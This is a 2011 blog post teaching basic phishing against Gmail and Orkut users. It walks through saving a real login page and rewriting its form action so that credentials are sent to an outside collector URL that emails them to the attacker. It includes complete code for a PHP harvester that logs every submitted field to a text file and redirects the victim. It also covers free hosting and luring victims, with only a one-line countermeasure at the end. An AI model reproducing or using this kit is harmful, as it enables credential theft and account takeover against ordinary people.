Thursday, July 21, 2011

Phishing(Basic Level)

What is Phishing?

Phishing is a technique to obtain password,username or any sensetive information like Credit card details using a fake page which pretends to be a real one.


How to perform the attack?

Method-1:Directing the username and password to your email Id

1.First You need to create a fake login page.So, how to do it?
Example:-open gmail.com in your browser. In the login page Click Right mouse button and save the page.

2.You must know basic HTML to understand this step: there is a keyword "ACTION" in the HTML code, its task is to send the details of the page to a handler(script), now what we have to do is change the value of that "ACTION" in the form. Lets see how to do it.
Example:-Open the saved login page(gmail.com in our example) with Notepad->press "ctrl+f"(find mode)->type "action" keyword to find.
Now you have located the "action", change the code: inside the two immediate double quotes, replace the code with:
"http://kyrion.in/download/adjgtr.phpid=example@gmail.com&link=gmail.com"
Replace "example@gmail.com" with your email id.
note:-the "link" in the above url is used to direct the page again to gmail.com, you can change it as per your need.

3.Now try login and check if you are getting the email or not. If everything is working good, now its time to upload these login pages. To do so choose any free webhosting sites(eg:my3gb.com): create an account, go to file manager and upload all files and folder which you have saved.

4.Now give the link(say:username.my3gb.com/gmail.html) of your fake login page to the victim through email or any other way. Now its upto you how to make your victim login through your fake page(use your head).





Method-2:Storing the username and password in txt file(uploaded in website)

1.First You need to create a fake login page.So, how to do it?
Example:-open orkut.com in your browser. In the login page Click Right mouse button and save the page.

2.Now create notify.php file.(copy and paste the below code and save it with name notify.php)



notify.php
<?php
header ('Location:http://www.orkut.com ');
$file = fopen("store.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, $value);
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
exit;
?>



3.Now create an empty store.txt file.

4.Open the login page saved earlier with notepad and find "action" word(hint:press "ctrl+f"). Change the value(inside two immediate double quotes) of action to "notify.php"
i.e. after submitting the login form will be handled by notify.php which will further redirect the page to orkut.com, check the header section of the php code, you can change it as per your need.









5.Upload all files(fake login page with folder,notify.php and store.txt) to my3gb.com(or any free hosting site).

 6. Serve your fake login page link to the victim. Once the victim login through your page, the login details will be stored in "store.txt" so don't forget to check the store.txt file.


Countermeasuers:

The only possible countermeasure is just don't enter the confidential data without checking the URL of the website. There are some other phishing attacks in which URL can be spoofed so better check the certificate of the website.

No comments:

Post a Comment